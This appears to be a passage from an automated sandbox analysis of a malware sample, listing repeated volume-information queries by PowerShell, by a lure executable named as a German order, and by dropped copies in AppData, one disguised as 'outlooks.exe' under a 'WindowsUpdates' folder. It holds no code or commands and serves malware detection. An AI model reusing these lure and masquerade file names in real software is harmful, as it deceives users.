                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeQueries volume information: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeQueries volume information: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeQueries volume information: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeQueries volume information: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
